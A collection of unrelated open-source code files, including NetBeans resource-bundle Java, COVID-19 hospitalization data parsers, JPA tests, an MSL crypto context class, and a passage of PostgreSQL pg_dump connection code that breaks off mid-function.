(MissingResourceException mre) { // Ignore exception, and... return sub2.getObject(key); } } } /** This class (enumeration) gives all localized sufixes using nextElement * method. It goes through given Locale and continues through Locale.getDefault() * Example 1: * Locale.getDefault().toString() -> "_en_US" * you call new LocaleIterator(new Locale("cs", "CZ")); * ==> You will gets: "_cs_CZ", "_cs", "", "_en_US", "_en" * * Example 2: * Locale.getDefault().toString() -> "_cs_CZ" * you call new LocaleIterator(new Locale("cs", "CZ")); * ==> You will gets: "_cs_CZ", "_cs", "" * * If there is a branding token in effect, you will get it too as an extra * prefix, taking precedence, e.g. for the token "f4jce": * * "_f4jce_cs_CZ", "_f4jce_cs", "_f4jce", "_f4jce_en_US", "_f4jce_en", "_cs_CZ", "_cs", "", "_en_US", "_en" * * Branding tokens with underscores are broken apart naturally: so e.g. * branding "f4j_ce" looks first for "f4j_ce" branding, then "f4j" branding, then none. 
*/ private static class LocaleIterator extends Object implements Iterator<String> { /** this flag means, if default locale is in progress */ private boolean defaultInProgress = false; /** this flag means, if empty suffix was exported yet */ private boolean empty = false; /** current locale, and initial locale */ private Locale locale; /** current locale, and initial locale */ private Locale initLocale; /** current suffix which will be returned in next calling nextElement */ private String current; /** the branding string in use */ private String branding; /** Creates new LocaleIterator for given locale. * @param locale given Locale */ public LocaleIterator(Locale locale) { this.locale = this.initLocale = locale; if (locale.equals(Locale.getDefault())) { defaultInProgress = true; } current = '_' + locale.toString(); if (brandingToken == null) { branding = null; } else { branding = "_" + brandingToken; // NOI18N } //System.err.println("Constructed: " + this); } /** @return next suffix. * @exception NoSuchElementException if there is no more locale suffix. */ public @Override String next() throws NoSuchElementException { if (current == null) { throw new NoSuchElementException(); } final String ret; if (branding == null) { ret = current; } else { ret = branding + current; } int lastUnderbar = current.lastIndexOf('_'); if (lastUnderbar == 0) { if (empty) { reset(); } else { current = ""; // NOI18N empty = true; } } else { if (lastUnderbar == -1) { if (defaultInProgress) { reset(); } else { // [PENDING] stuff with trying the default locale // after the real one does not actually seem to work... locale = Locale.getDefault(); current = '_' + locale.toString(); defaultInProgress = true; } } else { current = current.substring(0, lastUnderbar); } } //System.err.println("Returning: `" + ret + "' from: " + this); return ret; } /** Finish a series. * If there was a branding prefix, restart without that prefix * (or with a shorter prefix); else finish. */ private void reset() { if (branding != null) { current = '_' + initLocale.toString(); int idx = branding.lastIndexOf('_'); if (idx == 0) { branding = null; } else { branding = branding.substring(0, idx); } empty = false; } else { current = null; } } /** Tests if there is any sufix.*/ public @Override boolean hasNext() { return (current != null); } public @Override void remove() throws UnsupportedOperationException { throw new UnsupportedOperationException(); } } // end of LocaleIterator /** Classloader whose special trick is inserting debug information * into any *.properties files it loads. 
*/ static final class DebugLoader extends ClassLoader { /** global bundle index, each loaded bundle gets its own */ private static int count = 0; /** indices of known bundles; needed since DebugLoader's can be collected * when softly reachable, but this should be transparent to the user */ private static final Map<String,Integer> knownIDs = new HashMap<String,Integer>(); /** cache of existing debug loaders for regular loaders */ private static final Map<ClassLoader,Reference<ClassLoader>> existing = new WeakHashMap<ClassLoader,Reference<ClassLoader>>(); private DebugLoader(ClassLoader cl) { super(cl); //System.err.println ("new DebugLoader: cl=" + cl); } private static int getID(String name) { synchronized (knownIDs) { Integer i = knownIDs.get(name); if (i == null) { i = ++count; knownIDs.put(name, i); System.err.println("NbBundle trace: #" + i + " = " + name); // NOI18N } return i; } } public static ClassLoader get(ClassLoader normal) { //System.err.println("Lookup: normal=" + normal); synchronized (existing) { Reference<ClassLoader> r = existing.get(normal); if (r != null) { ClassLoader dl = r.get(); if (dl != null) { //System.err.println("\tcache hit"); return dl; } else { //System.err.println("\tcollected ref"); } } else { //System.err.println("\tnot in cache"); } ClassLoader dl = new DebugLoader(normal); existing.put(normal, new WeakReference<ClassLoader>(dl)); return dl; } } public @Override InputStream getResourceAsStream(String name) { InputStream base = super.getResourceAsStream(name); if (base == null) { return null; } if (name.endsWith(".properties")) { // NOI18N int id = getID(name); //System.err.println ("\tthis=" + this + " parent=" + getParent ()); boolean loc = name.indexOf("Bundle") != -1; // NOI18N return new DebugInputStream(base, id, loc); } else { return base; } } // [PENDING] getResource not overridden; but ResourceBundle uses getResourceAsStream anyhow /** Wrapper input stream which parses the text as it goes and adds annotations. * Resource-bundle values are annotated with their current line number and also * the supplied it, so e.g. if in the original input stream on line 50 we have: * somekey=somevalue * so in the wrapper stream (id 123) this line will read: * somekey=somevalue (123:50) * Since you see on stderr what #123 is, you can then pinpoint where any bundle key * originally came from, assuming NbBundle loaded it from a *.properties file. * @see {@link Properties#load} for details on the syntax of *.properties files. 
*/ static final class DebugInputStream extends InputStream { /** state transition diagram constants */ private static final int WAITING_FOR_KEY = 0; /** state transition diagram constants */ private static final int IN_COMMENT = 1; /** state transition diagram constants */ private static final int IN_KEY = 2; /** state transition diagram constants */ private static final int IN_KEY_BACKSLASH = 3; /** state transition diagram constants */ private static final int AFTER_KEY = 4; /** state transition diagram constants */ private static final int WAITING_FOR_VALUE = 5; /** state transition diagram constants */ private static final int IN_VALUE = 6; /** state transition diagram constants */ private static final int IN_VALUE_BACKSLASH = 7; private final InputStream base; private final int id; private final boolean localizable; /** current line number */ private int line = 0; /** line number in effect for last-encountered key */ private int keyLine = 0; /** current state in state machine */ private int state = WAITING_FOR_KEY; /** if true, the last char was a CR, waiting to see if we get a NL too */ private boolean twixtCrAndNl = false; /** if non-null, a string to serve up before continuing (length must be > 0) */ private String toInsert = null; /** if true, the next value encountered should be localizable if normally it would not be, or vice-versa */ private boolean reverseLocalizable = false; /** text of currently read comment, including leading comment character */ private StringBuffer lastComment = null; /** text of currently read value, ignoring escapes for now */ private final StringBuilder currentValue = new StringBuilder(); /** Create a new InputStream which will annotate resource bundles. * Bundles named Bundle*.properties will be treated as localizable by default, * and so annotated; other bundles will be treated as nonlocalizable and not annotated. * Messages can be individually marked as localizable or not to override this default, * in accordance with some I18N conventions for NetBeans. 
* @param base the unannotated stream * @param id an identifying number to use in annotations * @param localizable if true, this bundle is expected to be localizable * @see http://www.netbeans.org/i18n/ */ public DebugInputStream(InputStream base, int id, boolean localizable) { this.base = base; this.id = id; this.localizable = localizable; } public @Override int read() throws IOException { if (toInsert != null) { char result = toInsert.charAt(0); if (toInsert.length() > 1) { toInsert = toInsert.substring(1); } else { toInsert = null; } return result; } int next = base.read(); if (next == '\n') { twixtCrAndNl = false; line++; } else if (next == '\r') { if (twixtCrAndNl) { line++; } else { twixtCrAndNl = true; } } else { twixtCrAndNl = false; } switch (state) { case WAITING_FOR_KEY: switch (next) { case '#': case '!': state = IN_COMMENT; lastComment = new StringBuffer(); lastComment.append((char) next); return next; case ' ': case '\t': case '\n': case '\r': case -1: return next; case '\\': state = IN_KEY_BACKSLASH; return next; default: state = IN_KEY; keyLine = line + 1; return next; } case IN_COMMENT: switch (next) { case '\n': case '\r': String comment = lastComment.toString(); lastComment = null; if (localizable && comment.equals("#NOI18N")) { // NOI18N reverseLocalizable = true; } else if (localizable && comment.equals("#PARTNOI18N")) { // NOI18N System.err.println( "NbBundle WARNING (" + id + ":" + line + "): #PARTNOI18N encountered, will not annotate I18N parts" ); // NOI18N reverseLocalizable = true; } else if (!localizable && comment.equals("#I18N")) { // NOI18N reverseLocalizable = true; } else if (!localizable && comment.equals("#PARTI18N")) { // NOI18N System.err.println( "NbBundle WARNING (" + id + ":" + line + "): #PARTI18N encountered, will not annotate I18N parts" ); // NOI18N reverseLocalizable = false; } else if ( (localizable && (comment.equals("#I18N") || comment.equals("#PARTI18N"))) || // NOI18N (!localizable && (comment.equals("#NOI18N") || comment.equals("#PARTNOI18N"))) ) { // NOI18N System.err.println( "NbBundle WARNING (" + id + ":" + line + "): incongruous comment " + comment + " found for bundle" ); // NOI18N reverseLocalizable = false; } state = WAITING_FOR_KEY; return next; default: lastComment.append((char) next); return next; } case IN_KEY: switch (next) { case '\\': state = IN_KEY_BACKSLASH; return next; case ' ': case '\t': state = AFTER_KEY; return next; case '=': case ':': state = WAITING_FOR_VALUE; return next; case '\r': case '\n': state = WAITING_FOR_KEY; return next; default: return next; } case IN_KEY_BACKSLASH: state = IN_KEY; return next; case AFTER_KEY: switch (next) { case '=': case ':': state = WAITING_FOR_VALUE; return next; case '\r': case '\n': state = WAITING_FOR_KEY; return next; default: return next; } case WAITING_FOR_VALUE: switch (next) { case '\r': case '\n': state = WAITING_FOR_KEY; return next; case ' ': case '\t': return next; case '\\': state = IN_VALUE_BACKSLASH; return next; default: state = IN_VALUE; currentValue.setLength(0); return next; } case IN_VALUE: switch (next) { case '\\': // Gloss over distinction between simple escapes and \u1234, which is not important for us. // Also no need to deal specially with continuation lines; for us, there is an escaped // newline, after which will be more value, and that is all that is important. state = IN_VALUE_BACKSLASH; return next; case '\n': case '\r': case -1: // End of value. This is the tricky part. 
boolean revLoc = reverseLocalizable; reverseLocalizable = false; state = WAITING_FOR_KEY; if (localizable ^ revLoc) { // This value is intended to be localizable. Annotate it. assert keyLine > 0; toInsert = "(" + id + ":" + keyLine + ")"; // NOI18N if (next != -1) { toInsert += Character.valueOf((char) next); } keyLine = 0; // Now return the space before the rest of the string explicitly. return ' '; } else { // This is not supposed to be a localizable value, leave it alone. return next; } default: currentValue.append((char) next); return next; } case IN_VALUE_BACKSLASH: state = IN_VALUE; return next; default: throw new IOException("should never happen"); // NOI18N } } } } /** * Local charset to decode using UTF-8 by default, but automatically switching to ISO-8859-1 if UTF-8 decoding fails. * */ private static class UtfThenIsoCharset extends Charset { private final boolean onlyUTF8; /** * * @param acceptOnlyUTF8 If true there is no automatic switch to ISO-8859-1 if UTF-8 decoding fails. */ public UtfThenIsoCharset(boolean acceptOnlyUTF8) { super(UtfThenIsoCharset.class.getCanonicalName(), null); this.onlyUTF8 = acceptOnlyUTF8; } @Override public boolean contains(Charset arg0) { return this.equals(arg0); } @Override public CharsetDecoder newDecoder() { return new UtfThenIsoDecoder(this, 1.0f, 1.0f); } @Override public CharsetEncoder newEncoder() { throw new UnsupportedOperationException("Not supported yet."); } private final class UtfThenIsoDecoder extends CharsetDecoder { private CharsetDecoder decoderUTF; private CharsetDecoder decoderISO; // Not null means we switched to ISO protected UtfThenIsoDecoder(Charset cs, float averageCharsPerByte, float maxCharsPerByte) { super(cs, averageCharsPerByte, maxCharsPerByte); decoderUTF = StandardCharsets.UTF_8.newDecoder() .onMalformedInput(CodingErrorAction.REPORT) // We want to be informed of this error .onUnmappableCharacter(CodingErrorAction.REPORT); // We want to be informed of this error } @Override protected CoderResult decodeLoop(ByteBuffer in, CharBuffer out) { if (decoderISO != null) { // No turning back once we've switched to ISO return decoderISO.decode(in, out, false); } // To rewind if need to retry with ISO decoding in.mark(); out.mark(); // UTF decoding CoderResult cr = decoderUTF.decode(in, out, false); if (cr.isUnderflow() || cr.isOverflow()) { // Normal results return cr; } // If we're here there was a malformed-input or unmappable-character error with the UTF decoding if (UtfThenIsoCharset.this.onlyUTF8) { // But can't switch to ISO return cr; } // Switch to ISO in.reset(); out.reset(); decoderISO = StandardCharsets.ISO_8859_1.newDecoder(); return decoderISO.decode(in, out, false); } } } }
26,437
307
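The UtfThenIsoCharset in the NbBundle code above documents its intent: decode with strict UTF-8 first and, unless acceptOnlyUTF8 is set, switch permanently to ISO-8859-1 once a malformed or unmappable sequence is seen. A minimal Python sketch of that fallback idea, assuming whole-buffer decoding rather than the incremental CharsetDecoder protocol (the function name is mine, not part of the NetBeans code):

def decode_utf8_then_latin1(raw: bytes, only_utf8: bool = False) -> str:
    """Strict UTF-8 first; fall back to ISO-8859-1, which accepts every byte."""
    try:
        return raw.decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        if only_utf8:
            raise  # mirrors acceptOnlyUTF8 = true: report instead of switching
        return raw.decode("iso-8859-1")

# A Latin-1 encoded value that is not valid UTF-8 still decodes via the fallback.
print(decode_utf8_then_latin1(b"caf\xe9"))  # -> 'café'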
<reponame>trgswe/fs2open.github.com
#pragma once

#include "scripting/ade_api.h"
#include "model/model.h"

namespace scripting {
namespace api {

class mc_info_h {
  protected:
	mc_info info;
	bool valid = false;

  public:
	explicit mc_info_h(const mc_info& val);
	mc_info_h();

	mc_info *Get();
	bool IsValid();
};

DECLARE_ADE_OBJ(l_ColInfo, mc_info_h);

}
}
156
430
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import Dict from pandas import DataFrame from lib.cast import safe_float_cast from lib.io import read_file from lib.data_source import DataSource from lib.utils import pivot_table, table_rename from uk_covid19 import Cov19API class ScotlandDataSource(DataSource): @staticmethod def _parse(file_path: str, sheet_name: str, value_name: str): data = read_file(file_path, sheet_name=sheet_name) data.columns = [col.replace("NHS ", "").replace( " total", "") for col in data.iloc[1]] # Drop Golden Jubilee National Hospital - it has no hospitalizations and does not fit # any current matches in metadata.csv. data = data.drop(columns=["Golden Jubilee National Hospital"]) data = data.iloc[2:].rename(columns={"Date": "date"}) data = pivot_table(data.set_index("date"), pivot_name="match_string") data = data.rename(columns={"value": value_name}) data[value_name] = data[value_name].replace( "*", None).apply(safe_float_cast).astype(float) # Get date in ISO format data.date = data.date.apply(lambda x: x.date().isoformat()) # Add metadata data["key"] = None data["country_code"] = "GB" data["subregion1_code"] = "SCT" l2_mask = data.match_string == "Scotland" data.loc[l2_mask, "key"] = "GB_SCT" return data def parse(self, sources: Dict[str, str], aux: Dict[str, DataFrame], **parse_opts) -> DataFrame: hospitalized = ScotlandDataSource._parse( sources[0], sheet_name="Table 3a - Hospital Confirmed", value_name="new_hospitalized" ) intensive_care = ScotlandDataSource._parse( sources[0], sheet_name="Table 2a - ICU patients", value_name="new_intensive_care" ) return hospitalized.merge(intensive_care, how="outer") class UKL1DataSource(DataSource): def parse_dataframes( self, dataframes: Dict[str, DataFrame], aux: Dict[str, DataFrame], **parse_opts ) -> DataFrame: # Specify filter for overview / consolidated data # for the UK api_filter_overview = ["areaType=overview"] # Specify relevant metrics that will be used # according to Google's schema api_structure_hospitalization = { "date": "date", "newAdmissions": "newAdmissions", "cumAdmissions": "cumAdmissions", "hospitalCases": "hospitalCases", "covidOccupiedMVBeds": "covidOccupiedMVBeds", } api = Cov19API(filters=api_filter_overview, structure=api_structure_hospitalization) data = api.get_dataframe() # Rename columns and map to expected schema data = table_rename( data, { "date": "date", "newAdmissions": "new_hospitalized", "cumAdmissions": "total_hospitalized", "hospitalCases": "current_hospitalized", "covidOccupiedMVBeds": "current_ventilator", }, drop=True, ) # Add key data["key"] = "GB" return data class UKL2DataSource(DataSource): def parse_dataframes( self, dataframes: Dict[str, DataFrame], aux: Dict[str, DataFrame], **parse_opts ) -> DataFrame: # Specify filter for UK data at the nation granularity api_filter_overview = ["areaType=nation"] # Specify relevant metrics that will be used # according to Google's schema api_structure_hospitalization = { "areaName": "areaName", "date": "date", 
"newAdmissions": "newAdmissions", "cumAdmissions": "cumAdmissions", "hospitalCases": "hospitalCases", "covidOccupiedMVBeds": "covidOccupiedMVBeds", } api = Cov19API(filters=api_filter_overview, structure=api_structure_hospitalization) data = api.get_dataframe() # Add keys for all 4 nations data.loc[data["areaName"] == "England", "key"] = "GB_ENG" data.loc[data["areaName"] == "Northern Ireland", "key"] = "GB_NIR" data.loc[data["areaName"] == "Scotland", "key"] = "GB_SCT" data.loc[data["areaName"] == "Wales", "key"] = "GB_WLS" # Rename columns and map to expected schema data = table_rename( data, { "date": "date", "key": "key", "newAdmissions": "new_hospitalized", "cumAdmissions": "total_hospitalized", "hospitalCases": "current_hospitalized", "covidOccupiedMVBeds": "current_ventilator", }, drop=True, ) return data
2,314
1,531
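ScotlandDataSource._parse above reshapes a wide sheet (one column per NHS board, one row per date) into long form keyed by match_string, then assigns the GB_SCT key only to the Scotland-wide rows. A toy pandas sketch of that reshaping step, assuming the project's pivot_table helper behaves like a melt over the date index (column and value names here are illustrative):

import pandas as pd

# Stand-in for one parsed sheet: one row per date, one column per NHS board.
wide = pd.DataFrame(
    {"Lothian": [12, 15], "Scotland": [100, 110]},
    index=pd.Index(["2020-04-01", "2020-04-02"], name="date"),
)

# Wide -> long, one row per (date, board), mirroring pivot_table(..., pivot_name="match_string").
long_form = wide.reset_index().melt(
    id_vars="date", var_name="match_string", value_name="new_hospitalized"
)

# Only the country-level rows get a concrete key; boards are matched later by match_string.
long_form["key"] = None
long_form.loc[long_form["match_string"] == "Scotland", "key"] = "GB_SCT"
print(long_form)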
package org.ngrinder.http.cookie;

import org.apache.hc.client5.http.impl.cookie.BasicClientCookie;

import java.time.Instant;
import java.util.Date;

import static java.time.temporal.ChronoUnit.SECONDS;

public class Cookie {
	private final BasicClientCookie realCookie;

	public Cookie(String name, String value) {
		realCookie = new BasicClientCookie(name, value);
	}

	public Cookie(String name, String value, String domain, String path, int expire) {
		realCookie = new BasicClientCookie(name, value);
		realCookie.setDomain(domain);
		realCookie.setPath(path);
		if (expire >= 0) {
			realCookie.setExpiryDate(Date.from(Instant.now().plus(expire, SECONDS)));
		}
	}

	public static Cookie from(org.apache.hc.client5.http.cookie.Cookie realCookie) {
		Cookie cookie = new Cookie(realCookie.getName(), realCookie.getValue());
		cookie.realCookie.setDomain(realCookie.getDomain());
		cookie.realCookie.setPath(realCookie.getPath());
		cookie.realCookie.setExpiryDate(realCookie.getExpiryDate());
		return cookie;
	}

	BasicClientCookie getRealCookie() {
		return realCookie;
	}

	@Override
	public String toString() {
		return "Cookie(" +
			"name: " + realCookie.getName() +
			", value: " + realCookie.getValue() +
			", domain: " + realCookie.getDomain() +
			", path: " + realCookie.getPath() +
			", expire: " + realCookie.getExpiryDate() +
			")";
	}
}
499
32,544
<gh_stars>1000+ package com.baeldung.jpa.removal; import org.junit.Assert; import org.junit.Before; import org.junit.Test; import javax.persistence.EntityManager; import javax.persistence.EntityManagerFactory; import javax.persistence.Persistence; import javax.persistence.PersistenceException; import javax.persistence.TypedQuery; import javax.persistence.criteria.CriteriaBuilder; import javax.persistence.criteria.CriteriaQuery; import javax.persistence.criteria.Root; import java.util.ArrayList; import java.util.List; public class OrphanRemovalIntegrationTest { private static EntityManagerFactory factory; private static EntityManager entityManager; @Before public void setup() { factory = Persistence.createEntityManagerFactory("jpa-h2-removal"); entityManager = factory.createEntityManager(); } @Test public void whenLineItemIsRemovedFromOrderRequest_thenDeleteOrphanedLineItem() { createOrderRequestWithLineItems(); OrderRequest orderRequest = entityManager.find(OrderRequest.class, 1L); LineItem lineItem = entityManager.find(LineItem.class, 2L); orderRequest.removeLineItem(lineItem); entityManager.getTransaction().begin(); entityManager.merge(orderRequest); entityManager.getTransaction().commit(); Assert.assertEquals(1, findAllOrderRequest().size()); Assert.assertEquals(2, findAllLineItem().size()); } @Test(expected = PersistenceException.class) public void whenLineItemsIsReassigned_thenThrowAnException() { createOrderRequestWithLineItems(); OrderRequest orderRequest = entityManager.find(OrderRequest.class, 1L); orderRequest.setLineItems(new ArrayList<>()); entityManager.getTransaction().begin(); entityManager.merge(orderRequest); entityManager.getTransaction().commit(); } private void createOrderRequestWithLineItems() { List<LineItem> lineItems = new ArrayList<>(); lineItems.add(new LineItem("line item 1")); lineItems.add(new LineItem("line item 2")); lineItems.add(new LineItem("line item 3")); OrderRequest orderRequest = new OrderRequest(lineItems); entityManager.getTransaction().begin(); entityManager.persist(orderRequest); entityManager.getTransaction().commit(); Assert.assertEquals(1, findAllOrderRequest().size()); Assert.assertEquals(3, findAllLineItem().size()); } private List<OrderRequest> findAllOrderRequest() { CriteriaBuilder cb = entityManager.getCriteriaBuilder(); CriteriaQuery<OrderRequest> cq = cb.createQuery(OrderRequest.class); Root<OrderRequest> root = cq.from(OrderRequest.class); CriteriaQuery<OrderRequest> findAll = cq.select(root); TypedQuery<OrderRequest> findAllQuery = entityManager.createQuery(findAll); return findAllQuery.getResultList(); } private List<LineItem> findAllLineItem() { CriteriaBuilder cb = entityManager.getCriteriaBuilder(); CriteriaQuery<LineItem> cq = cb.createQuery(LineItem.class); Root<LineItem> root = cq.from(LineItem.class); CriteriaQuery<LineItem> findAll = cq.select(root); TypedQuery<LineItem> findAllQuery = entityManager.createQuery(findAll); return findAllQuery.getResultList(); } }
1,205
5,169
{
  "name": "ZCAlertFrame",
  "version": "0.0.2",
  "summary": "自定义Alert弹框",
  "homepage": "https://github.com/xiaowu2016/ZCAlertFrame",
  "license": {
    "type": "MIT",
    "file": "FILE_LICENSE"
  },
  "authors": {
    "zhangchao": "<EMAIL>"
  },
  "platforms": {
    "ios": null
  },
  "source": {
    "git": "https://github.com/xiaowu2016/ZCAlertFrame.git",
    "tag": "0.0.2"
  },
  "source_files": [
    "Classes",
    "ZCAlertFrame/ZCAlertFrame/Controller/**/*.{h,m}"
  ],
  "requires_arc": true
}
244
999
package marquez.client.models; import com.fasterxml.jackson.core.type.TypeReference; import com.google.common.collect.ImmutableMap; import java.net.URL; import java.time.Instant; import java.util.List; import java.util.Optional; import java.util.UUID; import javax.annotation.Nullable; import lombok.EqualsAndHashCode; import lombok.Getter; import lombok.NonNull; import lombok.ToString; import marquez.client.Utils; @EqualsAndHashCode @ToString public final class JobVersion { @Getter private final JobVersionId id; @Getter private final String name; @Getter private final Instant createdAt; @Getter private final UUID version; @Getter private final String namespace; @Nullable private final URL location; @Getter private final ImmutableMap<String, String> context; @Getter private final List<DatasetId> inputs; @Getter private final List<DatasetId> outputs; @Getter @Nullable private final Run latestRun; public JobVersion( @NonNull final JobVersionId id, @NonNull final String name, @NonNull final Instant createdAt, @NonNull final UUID version, @Nullable final URL location, @Nullable final ImmutableMap<String, String> context, List<DatasetId> inputs, List<DatasetId> outputs, @Nullable Run latestRun) { this.id = id; this.name = name; this.createdAt = createdAt; this.version = version; this.namespace = id.getNamespace(); this.location = location; this.context = (context == null) ? ImmutableMap.of() : context; this.inputs = inputs; this.outputs = outputs; this.latestRun = latestRun; } public Optional<URL> getLocation() { return Optional.ofNullable(location); } public static JobVersion fromJson(@NonNull final String json) { return Utils.fromJson(json, new TypeReference<JobVersion>() {}); } }
630
559
/** * Copyright (c) 2012-2014 Netflix, Inc. All rights reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.netflix.msl.crypto; import javax.crypto.SecretKey; import com.netflix.msl.MslError; import com.netflix.msl.MslMasterTokenException; import com.netflix.msl.tokens.MasterToken; import com.netflix.msl.util.MslContext; /** * This is a convenience class for constructing a symmetric crypto context from * a MSL session master token. * * @author <NAME> <<EMAIL>> */ public class SessionCryptoContext extends SymmetricCryptoContext { /** * <p>Construct a new session crypto context from the provided master * token.</p> * * @param ctx MSL context. * @param masterToken the master token. * @throws MslMasterTokenException if the master token is not trusted. */ public SessionCryptoContext(final MslContext ctx, final MasterToken masterToken) throws MslMasterTokenException { this(ctx, masterToken, masterToken.getIdentity(), masterToken.getEncryptionKey(), masterToken.getSignatureKey()); if (!masterToken.isDecrypted()) throw new MslMasterTokenException(MslError.MASTERTOKEN_UNTRUSTED, masterToken); } /** * <p>Construct a new session crypto context from the provided master token. * The entity identity and keys are assumed to be the same as what is * inside the master token, which may be untrusted.</p> * * @param ctx MSL context. * @param masterToken master token. May be untrusted. * @param identity entity identity. May be {@code null}. * @param encryptionKey encryption key. * @param hmacKey HMAC key. */ public SessionCryptoContext(final MslContext ctx, final MasterToken masterToken, final String identity, final SecretKey encryptionKey, final SecretKey hmacKey) { super(ctx, (identity != null) ? identity + "_" + masterToken.getSequenceNumber() : Long.toString(masterToken.getSequenceNumber()), encryptionKey, hmacKey, null); } }
799
502
<reponame>frewsxcv/WavTap #ifndef _SAMPLEAUDIODEVICE_HPP #define _SAMPLEAUDIODEVICE_HPP #include <IOKit/audio/IOAudioDevice.h> #define AUDIO_ENGINE_KEY "AudioEngine" #define DESCRIPTION_KEY "Description" #define BLOCK_SIZE_KEY "BlockSize" #define NUM_BLOCKS_KEY "NumBlocks" #define NUM_STREAMS_KEY "NumStreams" #define FORMATS_KEY "Formats" #define SAMPLE_RATES_KEY "SampleRates" #define SEPARATE_STREAM_BUFFERS_KEY "SeparateStreamBuffers" #define SEPARATE_INPUT_BUFFERS_KEY "SeparateInputBuffers" #define WavTapDevice com_wavtap_driver_WavTapDevice class WavTapEngine; class WavTapDevice : public IOAudioDevice { OSDeclareDefaultStructors(WavTapDevice); friend class WavTapEngine; static const SInt32 kVolumeMax; static const SInt32 kGainMax; SInt32 mVolume[NUM_CHANS+1]; SInt32 mMuteOut[NUM_CHANS+1]; SInt32 mMuteIn[NUM_CHANS+1]; SInt32 mGain[NUM_CHANS+1]; virtual bool initHardware(IOService *provider); virtual bool createAudioEngines(); virtual bool initControls(WavTapEngine *audioEngine); static IOReturn volumeChangeHandler(IOService *target, IOAudioControl *volumeControl, SInt32 oldValue, SInt32 newValue); virtual IOReturn volumeChanged(IOAudioControl *volumeControl, SInt32 oldValue, SInt32 newValue); static IOReturn outputMuteChangeHandler(IOService *target, IOAudioControl *muteControl, SInt32 oldValue, SInt32 newValue); virtual IOReturn outputMuteChanged(IOAudioControl *muteControl, SInt32 oldValue, SInt32 newValue); static IOReturn gainChangeHandler(IOService *target, IOAudioControl *gainControl, SInt32 oldValue, SInt32 newValue); virtual IOReturn gainChanged(IOAudioControl *gainControl, SInt32 oldValue, SInt32 newValue); static IOReturn inputMuteChangeHandler(IOService *target, IOAudioControl *muteControl, SInt32 oldValue, SInt32 newValue); virtual IOReturn inputMuteChanged(IOAudioControl *muteControl, SInt32 oldValue, SInt32 newValue); }; #endif
666
450
/*------------------------------------------------------------------------- * * pg_backup_db.c * * Implements the basic DB functions used by the archiver. * * IDENTIFICATION * $PostgreSQL: pgsql/src/bin/pg_dump/pg_backup_db.c,v 1.75 2006/10/04 00:30:05 momjian Exp $ * *------------------------------------------------------------------------- */ #include "pg_backup_db.h" #include "dumputils.h" #include <unistd.h> #include <ctype.h> #ifdef HAVE_TERMIOS_H #include <termios.h> #endif static const char *modulename = gettext_noop("archiver (db)"); static void _check_database_version(ArchiveHandle *AH); static PGconn *_connectDB(ArchiveHandle *AH, const char *newdbname, const char *newUser); static void notice_processor(void *arg __attribute__((unused)), const char *message); static char *_sendSQLLine(ArchiveHandle *AH, char *qry, char *eos); static char *_sendCopyLine(ArchiveHandle *AH, char *qry, char *eos); static bool _isIdentChar(unsigned char c); static bool _isDQChar(unsigned char c, bool atStart); #define DB_MAX_ERR_STMT 128 static int _parse_version(ArchiveHandle *AH, const char *versionString) { int v; v = parse_version(versionString); if (v < 0) die_horribly(AH, modulename, "could not parse version string \"%s\"\n", versionString); return v; } static void _check_database_version(ArchiveHandle *AH) { int myversion; const char *remoteversion_str; int remoteversion; myversion = _parse_version(AH, PG_VERSION); remoteversion_str = PQparameterStatus(AH->connection, "server_version"); if (!remoteversion_str) die_horribly(AH, modulename, "could not get server_version from libpq\n"); remoteversion = _parse_version(AH, remoteversion_str); AH->public.remoteVersionStr = strdup(remoteversion_str); AH->public.remoteVersion = remoteversion; if (!AH->archiveRemoteVersion) AH->archiveRemoteVersion = AH->public.remoteVersionStr; if (myversion != remoteversion && (remoteversion < AH->public.minRemoteVersion || remoteversion > AH->public.maxRemoteVersion)) { write_msg(NULL, "server version: %s; %s version: %s\n", remoteversion_str, progname, PG_VERSION); die_horribly(AH, NULL, "aborting because of server version mismatch\n"); } } /* * Reconnect to the server. If dbname is not NULL, use that database, * else the one associated with the archive handle. If username is * not NULL, use that user name, else the one from the handle. If * both the database and the user match the existing connection already, * nothing will be done. * * Returns 1 in any case. */ int ReconnectToServer(ArchiveHandle *AH, const char *dbname, const char *username) { PGconn *newConn; const char *newdbname; const char *newusername; if (!dbname) newdbname = PQdb(AH->connection); else newdbname = dbname; if (!username) newusername = PQuser(AH->connection); else newusername = username; /* Let's see if the request is already satisfied */ if (strcmp(newdbname, PQdb(AH->connection)) == 0 && strcmp(newusername, PQuser(AH->connection)) == 0) return 1; newConn = _connectDB(AH, newdbname, newusername); PQfinish(AH->connection); AH->connection = newConn; return 1; } /* * Connect to the db again. * * Note: it's not really all that sensible to use a single-entry password * cache if the username keeps changing. In current usage, however, the * username never does change, so one savedPassword is sufficient. We do * update the cache on the off chance that the password has changed since the * start of the run. 
*/ static PGconn * _connectDB(ArchiveHandle *AH, const char *reqdb, const char *requser) { PGconn *newConn; const char *newdb; const char *newuser; char *password = AH->savedPassword; bool new_pass; if (!reqdb) newdb = PQdb(AH->connection); else newdb = reqdb; if (!requser || strlen(requser) == 0) newuser = PQuser(AH->connection); else newuser = requser; ahlog(AH, 1, "connecting to database \"%s\" as user \"%s\"\n", newdb, newuser); if (AH->promptPassword == TRI_YES && password == NULL) { password = simple_prompt("Password: ", 100, false); if (password == NULL) die_horribly(AH, modulename, "out of memory\n"); } do { #define PARAMS_ARRAY_SIZE 7 const char **keywords = malloc(PARAMS_ARRAY_SIZE * sizeof(*keywords)); const char **values = malloc(PARAMS_ARRAY_SIZE * sizeof(*values)); if (!keywords || !values) die_horribly(AH, modulename, "out of memory\n"); keywords[0] = "host"; values[0] = PQhost(AH->connection); keywords[1] = "port"; values[1] = PQport(AH->connection); keywords[2] = "user"; values[2] = newuser; keywords[3] = "password"; values[3] = password; keywords[4] = "dbname"; values[4] = newdb; keywords[5] = 